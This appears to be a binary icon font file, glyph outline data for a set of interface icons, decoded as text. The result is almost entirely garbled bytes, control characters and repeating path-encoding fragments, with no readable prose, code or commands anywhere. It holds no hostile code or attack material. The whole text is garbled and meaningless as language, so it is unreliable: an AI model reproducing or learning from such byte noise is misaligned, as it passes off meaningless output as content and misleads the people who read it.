S>8	bb	8>S
	W	
S>8	bb��.R=##=R..R=##=R.)G55G))G55G)5KK55KK5(88((88*
S.>	
8	bb	8
	>.S

$W$
T->	
8	cc	8
	>-T
$W$�	"S>8bb8>S"	W	!S>8bb8>S!	W#=R..R=##=R..R=#�\5G))G55G))G5DK55KK55K�8((88((8`3Mg"32>54.'.7>'2#"1#"&5146%/.#!"3!2654&#!"&546?>3!25]F((F]55]F((F]]4�<<34�<<
�		(8		K�,0��0,�#-8(@(8-
��
�9
@
9��(F]55]F((F]55]F(��<
44�<<34��		8(		5K�n!!n6#� (88(�#6��

��		�@�@'3?.#!"3!26764#!"&5463!2'"32654&"&54632�:!��5KK5`!:�J�	��&&`	�
�(88((88(%%&& K5�5K JG�%&�%s8((88((8�%&&%�����4=Xk54.#"";2>=4&%4>32#54&#"#%!54632+".=463:3!:322#"&'.5463 -Ni<<iN-(8-Ni<�<iN-8��#=R..R=#@^BB^@`�K55K�#=R.�.R=#
 � 
��&

& �<iN--Ni<�8(�<iN--Ni<�(8�.R=##=R.��B^^B����5KK���.R=##=R.�

`%11%���`�'/6M_"3267>54..'0417'.'3"&'7!.'.54>322#"#"&546I�`7&560*ef)074&7`�
�	��
�q
�z��6-Oh<<hO-6�		B^		q�7`�I0cb`-����-`bc0I�`7��@	�
( 48p1<hO--Oh<0q83�		^B		Oq����&6EM_t�.#"01"93261%>7>.'.'81<''.'.''.#7>#"&5465767.'.'7>7646'.'.#7>32�(c4+M���KB.	�")&�S
/�'	
!1"
�Ή.�M)�"9w�>! 0�46*vz6*#'c456'L!m(+�����.BG�!V\Z&�Z*.,V�q
1
��v	
�
�(z9( @s#37�/6.W#'+6!E$";@@#(,/258;>BEIMQ'.#!"3267>54&#7?#'73;7'3'3'3#33!37'7%#�	
��
	�
	�		�
�Q�GWAQ�QAWG�PP� ��WOArp=�G���=p1O��N���qfq���WJ��JW���	

	�		�#�	!;IACCAI;5�q��w�AA�3	<33_A �w���P��P V=��=V���5E!"3!2654&!!7!"3!3!2654&/5!2654&#!"&5463!2`�@

�

�@�@��(88(@�

@

�@(88
��

@
 
�@

�
� ��8(��(8'

'8(�(8� 

�

�����4O2654&#"2#"&5467"3021265>54.#0&'.54>32OqqOOqqOB^^BB^^BO�i<@cu45tc@<i�K,m`B2WuBBuW2B`n,�qOPppPOq`^BB^^BB^�<h�PT���<<���TP�h<�D2���NBuW22WuBN���3�CXn��<'40'045.#""1"00132>7<16056454654&".'>32#2#1"#"&54638'"32>54."&54632�#l��PP��k##k��PP��l#�D�ta !`t�DC�t`!!`t�C

(8
	K5.R=##=R..R=##=R.OqqOOqq�CpQ--QpCBpQ..QoC��%C_9:^C%%C^::^C%�		8(

5K`#=R..R=##=R..R=#�`qOOqqOOq�Dm2#"#"&54>7"081326>732>54.#"&'*#">7<54&'.54>32		@tX4		8aHj��P ;S20&F;)2j��PP��j-	
6#	
,F1Gy�]]�yGGy��		5F&		.Q=$�<i�P2\QE+T$*(
<i�PP�i<�@
00:CK&BuW22WuBBuW2�#DS.#!"3!26=4&#!"&=!!";;26?3267>'.##"#'.+!��#��#�K55K?&�&����n�.	�	.�n5/�/�]�]q��	�5KK5�	�&&�� �
��]]�
��]]`��@����'+/48<'.#!";3!2674&5326=4&%!!'!7!!!'!7!5!�'!��!'#&!@%�%@!&#�C@ ��`��$$$$'��@`�uu%`&��!!@&`$b`��``�@��``@`���`�'7G!"3!2654&#!"&=!5!!5!5463!2+"&5146;2+"&5146;2�(88((88
�
@��@��

�	`		`	 	 		 	�8(��(88(@(8�`

@ � @

				��

		���0>LZhv��������!"#"3!2654&#!"&546;3265463!2"&5463!2#%"&5463!2#%"&5463!2#2#!"&5463%2#!"&5463%2#!"&54632#!"&5463%2#!"&5463%2#!"&5463%2#!"&5463!2#!"&54637326=4&+"73#��@(8 (8K55K8&�&
 


�
��				�				�				��		�				�				�		`		�				�				�				��		`		��		�

�
-���8(@8(��5KK5 (8��&&�
��



��	

	`	

	`	

	��
		
`
		
`
		
�
		
`
		
`
		
�
		
`
		
�
�

�
�� $'7!"3!2654&#!"&57326?'7#"&'463!2��5KK55KK�����&�&��

����f

�f&&�f K5�`5KK5�5K���P��&&�i	

	i�����3&&�����Sc���.'>54.#".+";267:13021;267267>'>76&'>76&'>?<54&'+"&546;2#*1"30232#*1"30232#*1"302321+"&#.'0&5467>7>546322"32654&"&54632��g-8'8.Q
!`(88(`-;9pC�(9			

,/�;
`

`
�*$		$$)($		,)3#		
�Bnd*7I,E
�U��				q/$+N<#8'1�*8(�(8
0++ '%B��



1#		-3		/&		$	



�FQX)Y?94;"��@				 ����/CIO[g!"3!2654&#!"&5463!2#!"3!2654&'.#".#"!7!'7#2654&#"72#"&546`�@5KK5�5KK&�@&&�&`��

�

hS�h����X�nV�hX(88((88(&&&&�K5�5KK55K��&&&&
��

@
 �Dq^x�͓��f
��a�T@8((88((8�&&&&���&.<JXft����'.#!"3!2654&#!"&5463!1;'#"&515%"&546;2#"&546;2#463!2#!"&2#!"&54632#!"&54632#!"&54632#!"&54637326=4&+"73#�	
�`(88(@(8
6
��

�8(�` %��0		�		�		�		�	�		��	�		� 		�		� 		�		� 		�		� 		�

�
-���	
8(�(88(`
�|


�(8 &�� 				`				P				�				`				`				 				@
�

�
�������#/;GS~����4632#"&4632#"&'4632#"&%4632#"&4632#"&4632#"&4632#"&7"#./.#!"3!26?>7232654&#!.#"!'3267'".54>32#"&'.546?62�







�



�



��









�	&.$�#,)/-'-$$.(	&&�C #Q,,P$� #Q,,Q#�5]F((F]55]F((F]iN;��


��


�






{



��
�*J��+o@>m+�� L+&%���,�(F]55]F((F]55]F(�aG����'.4;.#"38126?3267>76&'	./81	%.'�	�@�v	C6��s����^�����
�����		d�	n|�	�l�Mi���m�����)7����/KYg�54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>328181%54&#"3265>54&'4632.#"#"&5326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281814&#"326=>54&4632.#"#"&=326770181#"&'.'81.'85.'&4'.5467647>781>781>7>3281818((8##8((8##�

@

<


	


	�8((8##8((8##�

@

<


		

	��8((8##8((8##�

@

<


	


	�a(88(aB''B�(88(�B''Bw

C�

��





�a(88(aB''B�(88(�B''Bw

C�

��





��(88(�B''Ba(88(aB''B�

�=��

C�





����1F��3V	.7>7>7>7>7>7>76&.'>7.'.".'>3267>74&'.'&".'.#"7>7"'.'.'.#"267>73267>5.'.'>7>76&'.'&'.'.7467>7#.'>7>7:620"1"'.717>7>71>?4676211&'&47467>7� 	&%^36m.'6
@ 	&%^36m.'6��(PPP("���"(PPP("���"�	



	!
			�
	�




u



m@		#>%<E.(X2#��		#>%<E.(X2#��(PPP(n}j}n(PPP(n}j}n�	
			


	 					
A�



�


@����+Ig{���"32>54.#".=32>75101#".5049532>75101#".5049532>7".54>324632#"&54632#"&54632#"&Q��OO��QQ��OO��/<i�PP�i<Qfu;;ufQ<i�PP�i<Qfu;;ufQ<i�PP�i<Wen77neW��P�i<<i�PP�i<<i��











�3N6��6N33N6`6N3��4''4x'

'H4''4x'

'H4''4n##'44''44'� 


�


�


	���GS_c.#*.#"3267>7>53:7%.#"3267>7>534&'&'&676%&'&6765%�	��>#(.F`>(.F>#(.F
_>).F�
9h;:9h;%:g;:9h;1�� �`$��:&>1:;&"^�|:&>1:;&"�	�Y +*W!**WM +*W!**W�```���DR`t��"'#!"32;26=4&=405>7063>78181>7332>54.#46732+.%46;#"&#4&'313#1"&546;267.#"&'32654&+>32 1N(tB��6JJ6&%�& =i&M17T88T7�[&&[��&��&@�	`'&&-U%%U-y0NQ6JJ6QN0!:,,:�?4O_]CC]&��%% 
�\J4>M�SS�M�@08((80(8228�( !�
�8((8"'Q))Q'"��}c]CC]c}<i�PP�i<�!1M[g4&'%.#"32>57>#"&53267%%"#*'%.5467%623:4632#"&52#"&546* �_�` ** V&U�``�U&V *���
���`��



 &&%%�"4``4""4�� :,,: 4��EE>>```�

��

@f&&f���/Gbnz������.#"3021267>7326?>54&'"#"&'.7>?"/7.'.'%'&4?622654&#"72#"&546"32654&"&5463232654&#"72#"&5464632#"&4632#"&�.�M�!
%	�
-���h
�2eed2�K.
9.H�B)7-
���!//!!//!�!//!!//!�<&&&&@


M







I.	�
%-�m
�
-���P	.6���-9s
H'm6
-�
�/!!//!!/� /!!//!!/��`&&&&



�


�



���-2HVdu���#.'7>'..#"#"3!26=7>54&+7%2.#"#>.#"#>32'"#>32#.'"#>32.##!"&='463!2405&67>'8140181&45463201#"&'81"0%04#&67>'8181041&45463281#"&'1041'&05&67>'81401814&5463201#"&'818�V�	�ASa5As\?V!/p/!`!/p/���0YK<5DP,3]J4!9Sh�O11O#b?;_�%
';##;'
%Lv!/AP-N}nE@	��	�	`	�?


		
�
	

	
�

	
		 LJ.K6,Mj=/!	}!//!}	!/�2E)%>-"<R07]E'�*66*8HA3##�[E)G3UB;K��0		0�		y:-	;.	:.
;.	�:-	;.	��+2C'.#!"32673!2653267>?6&%#"&''!'7332673�	��	�@&@&@��
A**A
�`��`@��
U88U
����
&��w&&��&[$$��@�@��)77)����T�$J�14.10.132>76.'#".5467>'10>7067'#"&#.7>''.''.'#"&546?>?>?�A(/'/VS>$%.SvIk�P''E0V_�<_B#%3 '&

e0"
H
G@	
 		"1	@=�@^<hM-wGS�Y/����`8iQ1%=Q-=���<�=r(@R)An8G�`4p]=*<@<O^0`O-[ZV(�"7z.#\,86$).J %bW		qo.1,"Q3#L7.A : A!�,D"'&47>4&'."2764'&""'&4762"&'.467>2�****��

		[!  !!SVR!�2///�/�P��		

_/�///�-!RVS! !! �+jnj+,+jnj+��		

Z!RVS!!  !�7/�///�P��

		_///�/�2 !! !SVS �****
���(,048<JN\j'.'54&#!"313!26526=4&!5#73;#73#73#%546?>;#"&#3#4&+"#!7+'32�`&��%`	
8(&�&(8
������F!I��I@�jF����`
[�;
@���
�
��`
;�[
`Z��&&��
 (8�`&&�8( 3���`������  
���
@��@

���`
��
���+VZ^bfjnrvz#54&#"#54&#"#54&#"#"3!2654&##!"&546;326=3326=3326=323#3#3#73#3#3#3#3#3#��

�

�

�#22#V#22#
��

�

�

�

�
� ����������������`@

@@

@@

@2#�
#22#�#2��

�
@

@@

@@

@
�`@`@`````�```����(AEIPi�4632#"&%81=4&#!"3!26=81>4&!2.#154&#!".5463!5!!5!"&'5#!"&53!2!"3!7!"&5463!267>7461%%%%�8(�pIggI@Ig000���

�`
B.p�`��`���
�B.��.B9 �
��B^^B )��(88( 	@%%%%��`(8gI��IggI0$flfd
��

~(.B` @  @ ��.BB.�
@^BB^@8((87%B%����(5BNZr�����&>76..7>'&676&'.7>'7&676&.7>71"01&'&67>71>0#&'&67>7>'0"1&'&67#>7>1'.73>7816''.7>706161'.7>76016�b˵�'(M�cb˵�'(M��9V~C"#~��VV}D""��V�0

1
	$

SI�?JJ�?�2)b11*a�G-(?nkD>c
6Z83Q��(?H-
2>dlC3QY8
�(M�cb˵�'(M�cb˵���"��VV~C"#~��VV}D"�
1
	0
Y

�?JJ�?IJ���a12)b11*,1H?+Ik
bD=Y
P8E
?+1GucCIkOQ7
=Y
 `DT`l�.+";26=4&'#537'.+54&#!"31;326733267326=4&"&5463!2#"&54632!"&546327+.#"#.#"#"&=!26=32 

�
� `��*�8(� (88(8(%
D--D
�D--D
%(8�h

�

�&&%%�%%&&�
%
D--D
�
D--D
%
�(8��R
�

0	B��%�@(88(��(8`(8)77))77)8(�I
`

��
��&&&&&&&&�
)77))77)
`8(��	����(2;ENV_it~�����"32>54.#.'>7.'>70"#502.'.'>7:.'>7#>.'3.'>75*17>7'.'53'5>7##>3.'.'>73�g��NN��gg��NN��H� <19�B(BC"$-I#H&6Bu.7=|&H#I-�7.uB%=%O)��&I"�7;k+36 W"CB(�3+k; 6"I&��)O%���< �9<�8-!�8�!-�N��gg��NN��gg��N� 5e/
$7���!U2
�^&c;
�<-!4[*�
;c&�!-<%[\
�2`��1n:�f
2&
+M �
2U!�
&2
 M+)�:n1��
,`2$
/e5N��=s4BIQ*��4s=*QIB���� $(,04!2#!"&546"3!2654&#!3#735!5%35!5��%&�`%&

�

�` ``  ������%��%%�% 
��

�
@`@  �  �  ��  ����#!2#!"&54635!3535!5!5��%&�`%&:��`@ ����%��%%�%`  ``   �  @  ��`-148<ENRVZ!#37#7?4&#!"!732#!"&57546;3'375!'9>5!7%9!5!5!5���HH6lG$h
� 
fR��mm�%`&�`%`%��>>|�0�p00�������4�����`��`�@?? ]

��Z�``%lT�@%%�Tl%66�U++U*+���������`W  `  `  ��`+.26:'463!2!37!'''7/53!265''!5!5!5ii
�
k��&9�9�7F�����Fz`%�&`zImmc��`��`�`Z

��Z 11<����<g�T�@%%�T�g�``�  `  `  ����!$	#!"&54677"3!2654&#	!�ff
�`
&%�&%��������7��

�)%��%%�%������7%"3!2654&#����&%�&%b����`%��%%�%��`		3!265#!"&5	��``����
�
 &�`%��6���0��D�\

��\%%�`����`	'%%#!"&5	�..����&�`%�������C�@%%�`����`(,/37@I#37#74&#!"732#!"&57546;3'375!'9>5!7%96l�
� 
�Hwmm�%`&�`%`%��>>|�0�p00�������4���

���``%lT�@%%�Tl%66�U++U*+���������`��`)'''7/53!265'7"374&#!�F�����Fz`%�&`z��mm��
Ȏ�
� <<����<g�T�@%%�T�g�`` 
����
����	),.5467!'7!77"3!2654&#	!����������VV�Z&%�&%����������������KK%��%%�%������
'''7'7%"3!2654&#>�TT�����@&%�&%�HH������%��%%�%��`
%	3!2653!	#'%9!9.5�p%�&���@`�����4�`���@%%������)��`�����`
	3!2651'''7'7%�p%�&b�TT����`���@%%��^�HH������@���	 +.1594&'17''!7!"&5463!2!17'	!!'3535@��G0��VV��-@�%&�%��`�*��f@����0�   ��xxQCKK�Ll%�%%���7��������``�  @��� $('7'%77!"&5463!2'7!73535�q�������TTzK�-%&�%P__�`�   a������HHi%�%%����a���``�  @���4?BPW54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31/77@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<K4d{��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T8L4d|@���(5<'7'%77!"&5463!2.#"92654&#"3/77�D�������TTN		�%&�%5[�IggIIggIK4d{�;������HHC+)%�%%�2)��gIIggIIgXL4d|@���)@KN\'7'7754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"310DDDDDDD4�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<DDDDDDD
��Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A'7'77/7'%77!"&5463!2.#"92654&#"30DDDDDDD�D�������TTN		�%&�%5[�IggIIggIDDDDDDD�;������HHC+)%�%%�2)��gIIggIIg@���	#1HSV32654&'.#"54&'1>3:9''!.54679!"&5463!2#"&'17'	!��-<T%-<T��^N/�gVV����%&�%7IgI3T����f@����T<.*T<.	��Q$-mYKK�!�%�%%�^<Ig5+������@���	<#"&'.#"/7'%77!"&5463!2.#"9�gI :�: Ig%D�������TTN		�%&�%5[�: IggI :�;������HHC+)%�%%�2)@���)@KN\533##5#5754&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31  `` `��^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<@`` `` ���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T@���4A#53533##/7'%77!"&5463!2.#"92654&#"3 `` `` �D�������TTN		�%&�%5[�IggIIggI  `` `�;������HHC+)%�%%�2)��gIIggIIg@���4?BPT54&'1>3:9''!.54679!"&5463!2#"&'17'	!2654&#"31'35@�^N/�gVV����%&�%7IgI3T����f@���<TT<<TT<p���Q$-mYKK�!�%�%%�^<Ig5+��������T<<TT<<T�  @���(59'7'%77!"&5463!2.#"91"&54632'35�D�������TTN		�%&�%5[�IggIIgg���;������HHC+)%�%%�2)��gIIggIIg�   @!506610'&#&106610'9�yy��yOs �cn�e_v�kp�6666��44#�0+!��.+ / @3>610'&1 sOy��yy�p���#44`5566 `5!!#!'7���   ��������  �� `3!'7! ర���pర  �`5
#% ��`  P����2��  �`3-  ��@���� �`
5!!#!��   ������  �� � �`3!!� ���p�`@@�@
32'46"74&+��(8��8(%��%�@8(�`���(8 &����S%@@�@
"74&#�(8��8(@8(�`���(8@ @ 5C533##5#59>54&'54&+"7#'46;2979"&54632` `` `�C]]C8(�(8�� ��%�%C]]C<TT<<TT `` `` �dEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T@ @)6533##5#5'46;2&"#"3:71'2654&#"3` `` `���8(�(8+L8!!8L+IggIIggI `` `` �����(88(!8L++L8!gIIggIIg@ @)7;9>54&'54&+"7#'46;2979"&54632'35�C]]C8(�(8�� ��%�%C]]C<TT<<TT��adEEd!(88(�`��!Ԡ�S&%!dEEdT<<TT<<T�  @ @*.'46;2&"#"3:71'1"&54632'35���8(�(8+L8!!8L+IggIIgg��A�����(88(!8L++L8!gIIggIIg�  `���1CTX.10>32.#"1032>10&'10#"&'7#"&'7267>57'.#"7467>3%SP1f�l:,`�^.JK�:l�f1PSKJ.^�`,�K5$`5K$��  #2kFTF<H<[*6FTFk2*[<H<�5K$`K5$���  `���,4;?.10>32.#"32>10&'#"&'7#7'"	SP1f�l:V5K��:l�f1PS�K5}$``$`��  #2kFTFVK5�6FTFk2�5K}$``$ ��  `���+9GU9210#".10>"1032>10.#19"&54632'2654&#"3152654&#"31l�f11f�ll�f11f�l`�^..^�``�^..^�`5KK55KK5(88((88(



�FTFFTFFTFFTF <H<<H<<H<<H<��K55KK55K 8((88((8@



`���!.;1210#".10>2654&#"351"&54632'2654&#"3l�f11f�ll�f11f�l5KK55KK5(88((88(



�FTFFTFFTFFTF��K55KK55K 8((88((8@



@ �`	%%!!%7'33' � ������ � �g��jj��g��@�@���������@ �`	%%!!���@��@���@�@�����`�`,BP^###5.54>32#"&'1'353537.'9%4.#"32>51'9#"&546324&#"32651Q�``�Q	+Jc88cJ++Jc80���``p�$9�&AW22WA&&AW22WA&@8((88((8 %%%%Q�``�Q08cJ++Jc88cJ+	��p``�9$�2WA&&AW22WA&&AW2P(88((88(%%%%`�`+###5.54>32#"&'14&#"3265Q�``�Q	+Jc88cJ++Jc808((88((8Q�``�Q08cJ++Jc88cJ+	O(88((88(s �` GUc	2?7'77'732654&#"'"'&47.54>32#"&'19"&54632'2654&#"31!�i



UO0O`?0?�7PppPPp�0P`P<9�
#=R..R=##=R.4Y@`�5KK55KK5(88((88(�i


UO0O`?0?�pPPppP7��0P`P<9�4.R=##=R..R=#
Y@`@K55KK55K 8((88((8s �`&3'"'&47.54>32#"&'12654&#"3�0P`P<9�
#=R./Q=##=Q/4Y@`�5KK55KK50P`P<9�4.R=##=R..R=#
Y@`@K55KK55K `$(,0;3!53546;2!#!"&53!265!33333'"354&+����%�%�` 8(��(8 %`%� ` ` ` �
�
�   %% @��(88(` ��%%@@����
  
 `!%03!53546;2!#!"&533333'"354&+����%�%�` 8(��(8� ` ` �
�
�   %% @��(88(``����
  
�``$(,0;3##!"&5#53546;233!265!33333'"354&+�@8(��(8@�%�%@�@%`%� ` ` ` �
�
�� ��(88(` @%&@ ��%&`@�� �� �� �
@@
�``!%03##!"&5#53546;2333333'"354&+�@8(��(8@�%�%@�� ` ` �
�
�� ��(88(` @%&@`�� �� �� �
@@
��@�	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�P?oR00Ro??oR00Ro?8cJ++Jc88cJ++Jc8 � �  �0Ro??oR00Ro??oR0 +Jc88cJ++Jc88cJ+`��@�+%1".54>32'5#3#35'2654&#"3?oR00Ro??oR00Ro/`@@�P�0Ro??oR00Ro??oR0�� �  �� �@	5C5#3#359".54>32'2>54.#"312654&#"31 `@@�PS�l??l�SS�l??l�SL�d::d�LL�d::d�L� �  �?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�� �@+%1".54>32'5#3#352654&#"3S�l??l�SS�l??l�C`@@�P ?l�SS�l??l�SS�l?�� �   � @@"0#!!"&5463!#";#"&';"3!0&5461 �� ��(8/!0�0
% 0����`��8(p!/ ��`��%�� @@%%"&5463!#";!!0&5461!";# (8/!0� �� 0  8(p!/ �`��`� @@%38%#"&546;5!"3!37#"&5;'!01!"&5463'@��!/8(�@�``�� %
00�� �@@ � /!��(8���`��```��%0����@@� @@).#!#"&546;5!";#"&5463!01#'7����!/8( 0�P`` @@��`� /!��(8���``���@@3`����?]x�'?64/&"7'%#!"&546;46;46;232132762'54&+#!"&5#"3!2657%#"3!26=4&+54&+"32654&#"31NS��Si7		&		7S�ePC%� %% & 8( (8 & %s4&� 
 &��& 

�
�� @��@

 

@% &P				S��Si7

%

7S��cOt��%&�%%(88(%&`s&5��
%%
�`

 � �@�
 

 
 %& 				`����=Xe	''762754&+81#!"&=81#"3!2657>/&"%546;232#!"&=46;32654&#"3N��SijS7		&		7�PeC% &��% %%�%�&4s��& %@

��

@P				��Si<S7

%

7��Oct`& %& %�`&%@�5&s� &% 
 

 
				���`�5Vq~�%533##5#5!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3� `` `��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<�`` `` �&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T���`�5P]j%#53533##4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"32654&#"3�`` `` `% &��% %%!!8L+)��& %@

��

@P				�IggIIggI` `` `0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg���`�)Jer�%!"&546;46;46;232132#"&'94&+#!"&5#"3!.546329#"3!26=4&+54&+"32654&#"32654&#"3'35(��%% & 8( (8 & %+5gI)G�
 &��& 

3	
gI��@

 

@% &P				�<TT<<TT<p�&�%%(88(%&�-T3Ig#�
%%
�`
(Ig'
 

 
 %& 				��T<<TT<<T�  ���`�)DQ^b4&+81#!"&=81#"3!.54>321546;232#!"&=46;32654&#"31"&54632'35% &��% %%!!8L+)��& %@

��

@P				�IggIIgg��0�& %& %�`&9+L8! &% 
 

 
				��gIIggIIg�  ��� �=Xe546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �=J546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�& %@

��

@  %%� %% % &�				  &% 
 

 
 &�`%&�% &%  				��� �#Fan%'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				�h��hb &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �#FS%'7'#546;232#!"&=46;32#!"&546;813!26=89'2654&#"3�h��h @& %@

��

@  %%� %% % &�				�h��hb &% 
 

 
 &�`%&�% &%  				��� �#Fan'7'#546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3�h��h @& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				@h��h��  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��� �&I546;232#!"&=46332654&#"3##!"&=#";'7'32654&�& %@

��

�				� &��% %%�h��h�%%  &% 
 

 
				  && %�`&`h��h��%�&��� �=Xel546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"37''�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				(��x�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				����x���� �=JQ546;232#!"&=46;32#!"&546;813!26=89'2654&#"37''�& %@

��

@  %%� %% % &�				(��x�  &% 
 

 
 &�`%&�% &%  				����x�	��� �=Xeimquy546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5!5!5!5!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				���`��`��`��`�  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�  `  `  `  `  ��� �=JNRVZ^546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5!5!5!5!5�& %@

��

@  %%� %% % &�				���`��`��`��`�  &% 
 

 
 &�`%&�% &%  				�  `  `  `  `  
��� �=Xeimquy}���546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"3!5%3#7353#7353!53#7353!5�& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				0�```  @``  `�```  `  &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				��   `@  �`@    �`@    ��� �=JNRVZ^bfjn546;232#!"&=46;32#!"&546;813!26=89'2654&#"3!5%353535353!535353!5�& %@

��

@  %%� %% % &�				0�``@ @`@ `�``@ `  &% 
 

 
 &�`%&�% &%  				��   ``   �``     �``     �@� &-3!546;%!54&#!"!"&5463!2#?#"�
�%��`�
��
�0%&`&��v
`� 
�%  `

`��&`&%�@�0�
��@� 3!546;%5463!2!546;�%�&�� &`&�  
�`� &�%  `&%`���
�� 4?M%#53533##'!"&5!.#"74&#!"3!32654&'15463!2!9"&54632 `` `` ��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT� `` ` 
�gI(��&&��&#gI3T3`

`��T<<TT<<T��  +8%#53533###!"&5!.#"95463!2!2654&#"3 `` `` ��_&�)+L8!�&`&� �IggIIggI� `` `&��!8L+9@`&&`��gIIggIIg�� (3AE%!"&5!.#"74&#!"3!32654&'15463!2!9"&54632'35��M
�Ig
	�&��&&�G)Ig5+�@
`
�`p<TT<<TT��`
�gI(��&&��&#gI3T3`

`��T<<TT<<T�  �� ,0%!"&5!.#"95463!2!1"&54632'35��_&�)+L8!�&`&� �IggIIgg��@&��!8L+9@`&&`��gIIggIIg�  �@� &-159=3!546;%!54&#!"!"&5463!2#?#"!5!5!5!5�
�%��`�
��
�0%&`&��v
�@ �� ��`��``� 
�%  `

`��&`&%�@�0�
��  `  `  `  �@�  $(,!#"!"&55463!2!546;%!5!5!5!5��&�@%&`&�  
��� �� ��`��``��%�&`&%`���
�  `  `  `  
�@� &-159=AEIMQ%!"&5463!2#3!546;%!54&#!"7#"35%3#7357!5%3#73535%3#735��0%&`&��
�%��`�
��
�v
���``  `���``  `���``  @&`&%�@� � 
�%  `

`��
�   `@  �   `@  �   `@  �@�  $(,048<@!#"!"&55463!2!546;%35%35357!5%353535%3535��&�@%&`&�  
�� �`@ `���`@ `���`@ `��%�&`&%`���
`   ``   �   ``   �   ``   �@� &-43!546;%!54&#!"!"&5463!2#?#"'7''�
�%��`�
��
�0%&`&��v
���w�`� 
�%  `

`��&`&%�@�0�
�}��w��@� #!#"!"&55463!2!546;7''��&�@%&`&�  
��K��w�`��%�&`&%`���
3��w��@� &-159=3!546;%!54&#!"!"&5463!2#?#"3#7353#735�
�%��`�
��
�0%&`&��v
�``  @``  `� 
�%  `

`��&`&%�@�0�
�����`@  �@�  $!#"!"&55463!2!546;%3535��&�@%&`&�  
���   `��%�&`&%`���
���  �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!5!5�        %�%%� %         
�

� 
        ``�� ` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `  �  	�@`@DH3#53#3#3#3#53#%!"3#3#3#3#3#3#3!2654&#!5!7!5!�@@@@@@@@@@@@`� %@@@@@@@@@@@@%�%%`��  ��`� � � `   � �&  ` ` ` ` `  &&�&�� ` �@`(QUY#535#535#535#535463!2#!"&=#535#53533#3#3!2654&#!"3#3#3#3#!!735�        %�%%� %         
�

� 
        � �� �` ` ` `  &&� &&  ` `` `  

�

  ` ` ` `��``	�@`DH3#3#53#3#53#53#3#!"3#3#3#3#3#3#3!2654&#!5!�@@@@@@@@@@@@��`� %@@@@@@@@@@@@%�%%`�� � � �   � � @` &  ` ` ` ` `  &&�&����@`-V[32#!"&=35#535#535#535#535#535#546;7#3#33!2654&#!"#3#3#3#33'�@

� 
            
�``�     %�%%� %        @�@@@
� 

  ` ` ` ` `  
��``�� ` `  &&�&&  ` ` ` ��@@�@`!%)-159=AEJ32#!"&546;73535353535353535353535357�@%%� %%�``��@@@@@@@@@@@@@@@@@@@@@@@@`&� &&�&�```��  �    �  �      �    �  �    �@@S�  ` A5332#!"&546;533533533##5##5##5#"3!2654&+#5�  %%� %%  ` ` `` ` `  

�

  @  &�`%&�%             
�`

�
  �  �33#73#73#%3#!0"##5##5##5##5*1"3!2654&�  �  �  ��  � ` ` ` %%�%%�@@@@@@@@@@@@@@@%�`&%�&�  ` AEIMQUY5332#!"&546;533533533##5##5##5#"3!2654&+#5!5!5!5!5!5!5�  %%� %%  ` ` `` ` `  

�

  ����`��`��`��`��`�@  &�`%&�%             
�`

�
  �  `  `  `  `  `  �  �#'+/37;?CGK0"##5##5##5##5*1"3!2654&!5!5!5!5!5!5!5!5!5!5!5!%3#73#73#73#� ` ` ` %%�%%;�`��`��`��`��`��`��`  �  �  �  @@@@@@@@@%�`&%�&�` @ @ @ @ @ �@@@@@@@�  ` AEIMQUY]ae5332#!"&546;533533533##5##5##5#"3!2654&+#5!5%3#7353#7353!53#7353!5�  %%� %%  ` ` `` ` `  

�

  ��```  @``  `�```  `@  &�`%&�%             
�`

�
  �   `@  �`@    �`@    �  �?CGKOSW3#73#73#73#3#53#53#0"##5##5##5##5*1"3!2654&#535#535#53!5!5!5!5!5!   �  �  �  ��      � ` ` ` %%�%%��``````@����@@@@@@@�� � �  @@@@@@@@%�`&%�&��`@`@`�� � � �@`")3#!"&5463!!"3!265#"&=;'p�%� %&P��

�
�% 
v�`�%&�& 
� 

 %��
